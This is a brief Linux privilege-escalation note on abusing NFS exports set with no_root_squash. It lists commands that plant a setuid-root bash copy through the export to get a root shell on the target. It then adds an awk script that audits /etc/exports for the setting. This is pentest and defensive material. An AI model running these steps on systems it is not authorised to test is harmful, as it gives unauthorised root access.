NFS no_root_squash

linux, privesc, nfs

Overview

If an NFS export is configured with the no_root_squash option, an attacker can mount that export on their own machine and modify any file on it as the root user.

Steps

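# e.g. /home/james is an NFS export
# on the target, as the unprivileged user:
cd /home/james
cp /bin/bash .
# on the attacker's machine, where the export is mounted (here at /mnt):
cd /mnt
sudo chown root:root bash
sudo chmod u+s bash
# back on the target, in /home/james:
./bash -p
# enjoy!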
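
From the server side, the condition described in the overview can be checked by auditing the exports file for clients that end up with no_root_squash. The script below is an added example, not part of the original page; the function names and the sample exports content (apart from /home/james) are constructed for illustration, and it assumes that later options in an entry override earlier ones.

```sh
#!/bin/sh
# Added example, not from the original page: audit exports(5) entries for
# no_root_squash. Assumption: within one entry a later option overrides an
# earlier one, and "-opts" defaults are applied before per-client options.

# Prints "<export path> <client>" for every client that gets no_root_squash.
# Reads the file named in $1, or stdin when no argument is given.
find_no_root_squash() {
    awk '
    { sub(/#.*/, "") }                                  # drop comments
    /\\[ \t]*$/ { sub(/\\[ \t]*$/, ""); buf = buf $0 " "; next }  # join continued lines
    {
        $0 = buf $0; buf = ""
        if (NF < 2) next                                # blank or path-only line
        path = $1; defaults = ""
        for (i = 2; i <= NF; i++) {
            if ($i ~ /^-/) { defaults = substr($i, 2); continue }
            client = $i; opts = ""
            p = index(client, "(")
            if (p > 0) {
                opts = substr(client, p + 1); sub(/\).*/, "", opts)
                client = substr(client, 1, p - 1)
            }
            if (client == "") client = "*"              # "(opts)" alone: any host
            m = split(defaults "," opts, o, ","); unsquashed = 0
            for (j = 1; j <= m; j++) {
                if (o[j] == "no_root_squash") unsquashed = 1
                else if (o[j] == "root_squash") unsquashed = 0
            }
            if (unsquashed) print path, client
        }
    }' "${1:--}"
}

# Constructed sample exports file (hosts and most paths are made up).
sample_exports() {
    cat <<'EOF'
# constructed sample /etc/exports
/home/james   10.0.0.0/24(rw,sync,no_root_squash)
/srv/backup   backup01(rw,sync) *(ro,no_root_squash)
/srv/www      -sync,no_root_squash web01 web02(rw,root_squash)
/srv/data     db01(rw,sync) \
              db02(rw,no_root_squash)
EOF
}

sample_exports | find_no_root_squash
```

On an NFS server, run it as `find_no_root_squash /etc/exports`; any entry it prints should be switched to root_squash (the default) and re-exported with `exportfs -ra`.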